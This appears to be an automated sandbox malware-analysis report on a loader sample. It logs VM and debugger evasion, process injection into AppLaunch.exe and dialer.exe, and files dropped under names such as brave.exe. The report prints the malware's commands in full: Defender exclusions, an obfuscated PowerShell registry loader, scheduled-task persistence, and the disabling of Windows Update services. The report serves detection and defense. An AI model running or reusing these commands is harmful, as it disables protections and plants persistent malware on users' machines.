Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 100192	Thread sleep count: 9534 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1752	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176	Thread sleep count: 9403 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe TID: 6236	Thread sleep count: 410 > 30
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe TID: 6236	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6688	Thread sleep count: 8781 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356	Thread sleep count: 4881 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep count: 142 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564	Thread sleep count: 1352 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 9534	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9403
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Window / User API: threadDelayed 410
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 985
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4881
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1352

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe

Dropped PE file which has not been started: C:\Program Files\Google\Chrome\updater.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: ModuleAnalysisCache.28.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000016.00000002.543482492.0000000004F0A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Bl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: AppLaunch.exe, 00000002.00000003.392330700.00000000054CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: ModuleAnalysisCache.28.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svcupdater.exe, 00000011.00000002.549590050.0000019C0C0D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: ModuleAnalysisCache.28.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: ofg.exe, 0000000D.00000002.379289931.000002487E1F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllii

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00AFBE04 FindFirstFileExW,

0_2_00AFBE04

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00B1414C mov eax, dword ptr fs:[00000030h]	0_2_00B1414C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AF1D69 mov eax, dword ptr fs:[00000030h]	0_2_00AF1D69
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AFCF3A mov eax, dword ptr fs:[00000030h]	0_2_00AFCF3A

Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00AED093 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00AED093

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00AFF540 GetProcessHeap,

0_2_00AFF540

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AE9977 SetUnhandledExceptionFilter,	0_2_00AE9977
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AED093 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AED093
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AE9814 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AE9814
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AE9C62 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00AE9C62

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe

Section loaded: C:\Users\user\AppData\Local\Temp\3A08.tmp target: C:\Windows\System32\dialer.exe protection: readonly

Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00B14181 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,

0_2_00B14181

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E8A008	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Memory written: C:\Windows\System32\dialer.exe base: F066C1B010	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe

Thread register set: target process: 7188

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe ".(\"{1}{0}\" -f 'et','s') (\"6t\"+\"o\") ([type](\"{2}{0}{4}{1}{3}\" -f'e','mbl','refl','y','ction.asse') ) ; $dlr4s = [type](\"{3}{1}{2}{4}{0}\"-f'ry','osoft.w','in32.r','micr','egist') ; $6to::(\"{0}{1}\" -f 'l','oad').invoke( (.(\"{1}{2}{0}\" -f 't-item','g','e') (\"vari\"+\"ab\"+\"le\"+\":dlr4s\") ).\"va`lue\"::\"loc`alm`achine\".(\"{2}{1}{0}\" -f 'ey','ubk','opens').invoke((\"{1}{0}\"-f'e','softwar')).(\"{1}{0}{2}\" -f'u','getval','e').invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"ent`ryp`oint\".\"in`voke\"(${n`ull},${n`ull})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe ".(\"{1}{0}\" -f 'et','s') (\"6t\"+\"o\") ([type](\"{2}{0}{4}{1}{3}\" -f'e','mbl','refl','y','ction.asse') ) ; $dlr4s = [type](\"{3}{1}{2}{4}{0}\"-f'ry','osoft.w','in32.r','micr','egist') ; $6to::(\"{0}{1}\" -f 'l','oad').invoke( (.(\"{1}{2}{0}\" -f 't-item','g','e') (\"vari\"+\"ab\"+\"le\"+\":dlr4s\") ).\"va`lue\"::\"loc`alm`achine\".(\"{2}{1}{0}\" -f 'ey','ubk','opens').invoke((\"{1}{0}\"-f'e','softwar')).(\"{1}{0}{2}\" -f'u','getval','e').invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"ent`ryp`oint\".\"in`voke\"(${n`ull},${n`ull})"
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\ofg.exe "C:\Users\user\AppData\Local\Microsoft\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\brave.exe "C:\Users\user\AppData\Local\Microsoft\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\setup.exe "C:\Users\user\AppData\Local\Microsoft\setup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\ofg.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0

Source: dialer.exe, 0000002F.00000002.498297768.0000024EC369E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ProgmaninPreviewonsStubH

Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00AFF109
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00AFE97D
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00AFF2DE
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00AFF20F
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00AF6BA9
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00AFEC1F
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00AFEC6A
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00AFED90
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00AFED05
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00AF6687
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00AFEFE3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
